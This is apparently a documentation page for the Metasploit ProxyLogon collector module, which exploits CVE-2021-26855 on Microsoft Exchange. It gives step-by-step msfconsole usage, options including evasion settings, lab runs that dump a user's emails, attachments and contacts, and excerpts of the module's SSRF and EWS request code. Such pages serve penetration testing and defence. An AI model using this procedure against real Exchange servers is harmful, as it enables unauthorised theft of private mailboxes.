Microsoft Exchange ProxyLogon Collector - Metasploit
This page contains detailed information about how to use the auxiliary/gather/exchange_proxylogon_collector metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Microsoft Exchange ProxyLogon Collector
Module: auxiliary/gather/exchange_proxylogon_collector
Source code: modules/auxiliary/gather/exchange_proxylogon_collector.rb
Disclosure date: 2021-03-02
Last modification time: 2022-02-23 16:27:12 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-26855
This module is also known as ProxyLogon.
This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments, contacts, ...). This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/gather/exchange_proxylogon_collector
msf auxiliary(exchange_proxylogon_collector) > show targets
... a list of targets ...
msf auxiliary(exchange_proxylogon_collector) > set TARGET target-id
msf auxiliary(exchange_proxylogon_collector) > show options
... show and set options ...
msf auxiliary(exchange_proxylogon_collector) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
EMAIL: The email account what you want dump
Knowledge Base
Vulnerable Application
CVE-2021-28855 is a pre-authentication SSRF (Server Side Request Forgery) which allows an attacker to bypass authentication by sending specially crafted HTTP requests. This vulnerability is part of an attack chain used to perform an RCE (Remote Code Execution).
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).
Introduction
This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).
By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments, contacts, ...).
All components are vulnerable by default.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/gather/exchange_proxylogon
- Do:
set RHOSTS [IP]
- Do:
set EMAIL [EMAIL ADDRESS]
- Do:
run
Options
ATTACHMENTS
Dump documents attached to an email. Default: true
The email account what you want dump.
FOLDER
The email folder what you want dump. Default: inbox
It is also possible to use other attributes such as: drafts, sentitems, ...
More info about this in the references.
METHOD
HTTP Method to use for the check (only). Default: POST
TARGET
Force the name of the internal Exchange server targeted.
Advanced Options
MaxEntries
Override the maximum number of object to dump.
Auxiliary Actions
Dump (Contacts)
Dump user contacts from exchange server.
Dump (Emails)
Dump user emails from exchange server.
Scenarios
msf6 auxiliary(gather/exchange_proxylogon_collector) > options
Module options (auxiliary/gather/exchange_proxylogon_collector):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACHMENTS true yes Dump documents attached to an email
EMAIL [email protected] yes The email account what you want dump
FOLDER inbox yes The email folder what you want dump
METHOD POST yes HTTP Method to use for the check (only). (Accepted: GET, POST)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.20.2.110 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGET no Force the name of the internal Exchange server targeted
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Dump (Emails) Dump user emails from exchange server
msf6 auxiliary(gather/exchange_proxylogon_collector) > run
[*] Running module against 172.20.2.110
[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-26855
[*] * internal server name (EXCH2K16)
[*] https://172.20.2.110:443 - Sending autodiscover request
[*] * Server: [email protected]
[*] * LegacyDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=9b9d8cf634f44ec4a0eda5c1c7c311da-Gasto
[*] https://172.20.2.110:443 - Sending mapi request
[*] * sid: S-1-5-21-3756917241-677735496-3570881102-1141 ([email protected])
[*] https://172.20.2.110:443 - Selecting the first internal server found
[*] * targeting internal: server2
[*] https://172.20.2.110:443 - Attempt to dump emails for
[*] * successfuly connected to: inbox
[*] * selected folder: inbox (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDAAAAA==)
[*] * number of email found: 4
[*] https://172.20.2.110:443 - Processing dump of 4 items
[*] * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAA6ItL
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_455715.txt
[*] -> attachment: AAAYAGdhc3Rvbi5sYWdhZmZlQHB3bmVkLmxhYgBGAAAAAADrkJkCKokiS4l8mFlWE+uTBwAkbr8AAlxKQLoRtd4lI1YMAAAAAAEMAAAkbr8AAlxKQLoRtd4lI1YMAAAA6IA6AAABEgAQAFejlEQ+wzFDoBLnyMUbSk4= (Messagerie - Administrator - Outlook.pdf)
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_392827.pdf
[*] -> attachment: AAAYAGdhc3Rvbi5sYWdhZmZlQHB3bmVkLmxhYgBGAAAAAADrkJkCKokiS4l8mFlWE+uTBwAkbr8AAlxKQLoRtd4lI1YMAAAAAAEMAAAkbr8AAlxKQLoRtd4lI1YMAAAA6IA6AAABEgAQAAZVIXO5iaNNtJIokpS4aB4= (03.png)
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_187857.png
[*]
[*] * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAA6ItK
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_470603.txt
[*]
[*] * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAAAAEc
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_296938.txt
[*]
[*] * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAAAAEX
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_524052.txt
[*]
[*] Auxiliary module execution completed
msf6 auxiliary(gather/exchange_proxylogon_collector) > set action Dump\ (Contacts)
action => Dump (Contacts)
msf6 auxiliary(gather/exchange_proxylogon_collector) > run
[*] Running module against 172.20.2.110
[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-26855
[*] * internal server name (EXCH2K16)
[*] https://172.20.2.110:443 - Sending autodiscover request
[*] * Server: [email protected]
[*] * LegacyDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=9b9d8cf634f44ec4a0eda5c1c7c311da-Gasto
[*] https://172.20.2.110:443 - Sending mapi request
[*] * sid: S-1-5-21-3756917241-677735496-3570881102-1141 ([email protected])
[*] https://172.20.2.110:443 - Selecting the first internal server found
[*] * targeting internal: server2
[*] https://172.20.2.110:443 - Attempt to dump contacts for
[*] * successfuly connected to: contacts
[*] * selected folder: contacts (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDgAAAA==)
[*] * number of contact found: 1
[*] https://172.20.2.110:443 - Processing dump of 1 items
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120243_default_172.20.2.110_gaston.lagaffep_160567.txt
[*] Auxiliary module execution completed
msf6 auxiliary(gather/exchange_proxylogon_collector) >
References
Go back to menu.
Msfconsole Usage
Here is how the gather/exchange_proxylogon_collector auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/exchange_proxylogon_collector
msf6 auxiliary(gather/exchange_proxylogon_collector) > show info
Name: Microsoft Exchange ProxyLogon Collector
Module: auxiliary/gather/exchange_proxylogon_collector
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2021-03-02
Provided by:
Orange Tsai
GreyOrder
mekhalleh (RAMELLA S��bastien)
Available actions:
Name Description
---- -----------
Dump (Contacts) Dump user contacts from exchange server
Dump (Emails) Dump user emails from exchange server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACHMENTS true yes Dump documents attached to an email
EMAIL yes The email account what you want dump
FOLDER inbox yes The email folder what you want dump
METHOD POST yes HTTP Method to use for the check (only). (Accepted: GET, POST)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGET no Force the name of the internal Exchange server targeted
VHOST no HTTP server virtual host
Description:
This module exploit a vulnerability on Microsoft Exchange Server
that allows an attacker bypassing the authentication and
impersonating as the admin (CVE-2021-26855). By taking advantage of
this vulnerability, it is possible to dump all mailboxes (emails,
attachments, contacts, ...). This vulnerability affects (Exchange
2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013,
Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 <
15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components
are vulnerable by default.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-26855
Logo: https://proxylogon.com/images/logo.jpg
https://proxylogon.com/
https://aka.ms/exchangevulns
https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/distinguishedfolderid
https://github.com/3gstudent/Homework-of-Python/blob/master/ewsManage.py
Also known as:
ProxyLogon
Module Options
This is a complete list of options available in the gather/exchange_proxylogon_collector auxiliary module:
msf6 auxiliary(gather/exchange_proxylogon_collector) > show options
Module options (auxiliary/gather/exchange_proxylogon_collector):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACHMENTS true yes Dump documents attached to an email
EMAIL yes The email account what you want dump
FOLDER inbox yes The email folder what you want dump
METHOD POST yes HTTP Method to use for the check (only). (Accepted: GET, POST)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGET no Force the name of the internal Exchange server targeted
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Dump (Emails) Dump user emails from exchange server
Advanced Options
Here is a complete list of advanced options supported by the gather/exchange_proxylogon_collector auxiliary module:
msf6 auxiliary(gather/exchange_proxylogon_collector) > show advanced
Module advanced options (auxiliary/gather/exchange_proxylogon_collector):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
MaxEntries 2147483647 no Override the maximum number of object to dump
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/exchange_proxylogon_collector module can do:
msf6 auxiliary(gather/exchange_proxylogon_collector) > show actions
Auxiliary actions:
Name Description
---- -----------
Dump (Contacts) Dump user contacts from exchange server
Dump (Emails) Dump user emails from exchange server
Evasion Options
Here is the full list of possible evasion options supported by the gather/exchange_proxylogon_collector auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/exchange_proxylogon_collector) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Number of contact recalculated due to max entries: <MAXENTRIES>
- The user has no contacts
- Number of email recalculated due to max entries: <MAXENTRIES>
- No Autodiscover information was found
- No email address was found
- No 'LegacyDN' was found
- No 'Server ID' was found
- No 'OWAUrl' was found
- Server did not respond in an expected way
- No 'X-FEServer' was found
- No internal target was found
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Number of contact recalculated due to max entries: <MAXENTRIES>
Here is a relevant code snippet related to the "Number of contact recalculated due to max entries: <MAXENTRIES>" error message:
93:
94: total_count = xml.at_xpath('//t:ContactsFolder/t:TotalCount', XMLNS)&.content
95: print_status("Number of contact found: #{total_count}")
96:
97: if total_count.to_i > datastore['MaxEntries']
98: print_warning("Number of contact recalculated due to max entries: #{datastore['MaxEntries']}")
99: total_count = datastore['MaxEntries'].to_s
100: end
101:
102: response = send_xml('POST', ssrf, soap_listitems(action['id_attribute'], total_count))
103: xml = Nokogiri::XML.parse(response.body)
The user has no contacts
Here is a relevant code snippet related to the "The user has no contacts" error message:
103: xml = Nokogiri::XML.parse(response.body)
104:
105: print_status(message("Processing dump of #{total_count} items"))
106: data = xml.xpath('//t:Items/t:Contact', XMLNS)
107: if data.empty?
108: print_status('The user has no contacts')
109: else
110: write_loot("#{datastore['EMAIL']}_#{action['id_attribute']}", data.to_s)
111: end
112: end
113: end
Number of email recalculated due to max entries: <MAXENTRIES>
Here is a relevant code snippet related to the "Number of email recalculated due to max entries: <MAXENTRIES>" error message:
125:
126: total_count = xml.at_xpath('//t:Folder/t:TotalCount', XMLNS)&.content
127: print_status("Number of email found: #{total_count}")
128:
129: if total_count.to_i > datastore['MaxEntries']
130: print_warning("Number of email recalculated due to max entries: #{datastore['MaxEntries']}")
131: total_count = datastore['MaxEntries'].to_s
132: end
133:
134: print_status(message("Processing dump of #{total_count} items"))
135: download_items(total_count, ssrf)
No Autodiscover information was found
Here is a relevant code snippet related to the "No Autodiscover information was found" error message:
194:
195: response = send_xml('POST', "#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}", soap_autodiscover)
196:
197: case response.body
198: when %r{<ErrorCode>500</ErrorCode>}
199: fail_with(Failure::NotFound, 'No Autodiscover information was found')
200: when %r{<Action>redirectAddr</Action>}
201: fail_with(Failure::NotFound, 'No email address was found')
202: end
203:
204: xml = Nokogiri::XML.parse(response.body)
No email address was found
Here is a relevant code snippet related to the "No email address was found" error message:
196:
197: case response.body
198: when %r{<ErrorCode>500</ErrorCode>}
199: fail_with(Failure::NotFound, 'No Autodiscover information was found')
200: when %r{<Action>redirectAddr</Action>}
201: fail_with(Failure::NotFound, 'No email address was found')
202: end
203:
204: xml = Nokogiri::XML.parse(response.body)
205:
206: legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content
No 'LegacyDN' was found
Here is a relevant code snippet related to the "No 'LegacyDN' was found" error message:
202: end
203:
204: xml = Nokogiri::XML.parse(response.body)
205:
206: legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content
207: fail_with(Failure::NotFound, 'No \'LegacyDN\' was found') if legacy_dn.empty?
208:
209: server = ''
210: owa_urls = []
211: xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|
212: type = item.at_xpath('./xmlns:Type', xmlns)&.content
No 'Server ID' was found
Here is a relevant code snippet related to the "No 'Server ID' was found" error message:
218:
219: item.xpath('./xmlns:Internal/xmlns:OWAUrl', xmlns).each do |owa_url|
220: owa_urls << owa_url.content
221: end
222: end
223: fail_with(Failure::NotFound, 'No \'Server ID\' was found') if server.nil? || server.empty?
224: fail_with(Failure::NotFound, 'No \'OWAUrl\' was found') if owa_urls.empty?
225:
226: return([server, legacy_dn, owa_urls])
227: end
228:
No 'OWAUrl' was found
Here is a relevant code snippet related to the "No 'OWAUrl' was found" error message:
219: item.xpath('./xmlns:Internal/xmlns:OWAUrl', xmlns).each do |owa_url|
220: owa_urls << owa_url.content
221: end
222: end
223: fail_with(Failure::NotFound, 'No \'Server ID\' was found') if server.nil? || server.empty?
224: fail_with(Failure::NotFound, 'No \'OWAUrl\' was found') if owa_urls.empty?
225:
226: return([server, legacy_dn, owa_urls])
227: end
228:
229: def send_http(method, ssrf, data: '', ctype: 'application/x-www-form-urlencoded')
Server did not respond in an expected way
Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:
234: 'ctype' => ctype
235: }
236: request = request.merge({ 'data' => data }) unless data.empty?
237:
238: received = send_request_cgi(request)
239: fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received
240:
241: received
242: end
243:
244: def send_xml(method, ssrf, data, ctype: 'text/xml; charset=utf-8')
No 'X-FEServer' was found
Here is a relevant code snippet related to the "No 'X-FEServer' was found" error message:
383: print_status(message('Attempt to exploit for CVE-2021-26855'))
384:
385: # request for internal server name.
386: response = send_http(datastore['METHOD'], "localhost~#{random_ssrf_id}")
387: if response.code != 500 || !response.headers.to_s.include?('X-FEServer')
388: fail_with(Failure::NotFound, 'No \'X-FEServer\' was found')
389: end
390: server_name = response.headers['X-FEServer']
391: print_status("Internal server name (#{server_name})")
392:
393: # get informations by autodiscover request.
No internal target was found
Here is a relevant code snippet related to the "No internal target was found" error message:
412: target = host
413: print_good("Targeting internal: #{url}")
414:
415: break
416: end
417: fail_with(Failure::NotFound, 'No internal target was found') if target.empty?
418: else
419: target = datastore['TARGET']
420: print_good("Targeting internal forced to: #{target}")
421: end
422:
Go back to menu.
Related Pull Requests
References
- CVE-2021-26855
- LOGO-https://proxylogon.com/images/logo.jpg
- https://proxylogon.com/
- https://aka.ms/exchangevulns
- https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/distinguishedfolderid
- https://github.com/3gstudent/Homework-of-Python/blob/master/ewsManage.py
See Also
Check also the following modules related to this module:
- auxiliary/scanner/http/exchange_proxylogon
- exploit/windows/http/exchange_proxylogon_rce
- auxiliary/scanner/http/exchange_web_server_pushsubscription
- auxiliary/scanner/msmail/exchange_enum
- exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
- exploit/windows/http/exchange_chainedserializationbinder_rce
- exploit/windows/http/exchange_ecp_dlp_policy
- exploit/windows/http/exchange_ecp_viewstate
- exploit/windows/http/exchange_proxynotshell_rce
- exploit/windows/http/exchange_proxyshell_rce
- auxiliary/dos/windows/smtp/ms06_019_exchange
- auxiliary/dos/windows/ssh/sysax_sshd_kexchange
- auxiliary/gather/lansweeper_collector
- auxiliary/gather/search_email_collector
- auxiliary/gather/searchengine_subdomains_collector
- exploit/windows/http/jira_collector_traversal
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/purevpn_cred_collector
- exploit/windows/smtp/ms03_046_exchange2000_xexch50
- exploit/windows/ssh/freeftpd_key_exchange
- exploit/windows/ssh/freesshd_key_exchange
- post/windows/gather/exchange
Related Nessus plugins:
- Security Updates for Microsoft Exchange Server (March 2021)
- Microsoft Exchange Server Authentication Bypass
Authors
- Orange Tsai
- GreyOrder
- mekhalleh (RAMELLA Sébastien)
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.